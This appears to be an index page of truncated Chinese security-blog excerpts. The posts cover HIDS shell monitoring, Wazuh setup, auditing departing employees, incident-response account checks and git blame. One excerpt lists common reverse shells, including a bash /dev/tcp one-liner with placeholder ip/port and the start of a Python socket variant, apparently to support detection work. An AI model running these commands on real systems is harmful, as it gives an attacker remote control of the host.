加入MT刚好3个月整,来记录一些自己的发现和感悟。 入职第一周-如何快速进入工作状态 和所有新人一样,公司的新人培训计划提供了很多了解公司以及如...
HIDS基本原理 熟悉HIDS的朋友应该了解,服务器的shell监控一般有两种,一种依靠Linux的audit审计功能,比如Wazuh,一种是重...
我目前就职于一家私企的安全部,主要做安全审计的工作,很多公司的离职流程没有考虑过员工的异常行为审计,18年我在逛微博的时候看到google的一条...
常见反弹: bash -i >& /dev/tcp/ip/port0>&1 python -c"import os,socket,subproc...
测试环境: CentOS Linux release 7.6.1810 Wazuh 3.10.2 1、wazuh服务器上安装postfii及相关...
一、Wazuh 守护进程及工具进程 守护进程 ossec-agentd https://documentation.wazuh.com/3.10...
Wazuh简介 前端时间调研了一些HIDS的开源系统: https://github.com/Neo23x0/Fenrir更加方便(不需要安装代...
账号排查 grep :0: /etc/passwd #检查是否产生了新用户,和UID、GID为0的用户 stat /etc/passwd #检查...
命令名称: git-blame - 显示文件的每一行最后修改的版本和作者 用法: git blame [-c] [-b] [-l...